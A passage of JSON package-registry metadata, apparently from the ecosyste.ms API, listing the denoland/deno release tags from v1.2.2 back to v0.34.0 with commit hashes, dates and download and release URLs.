63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-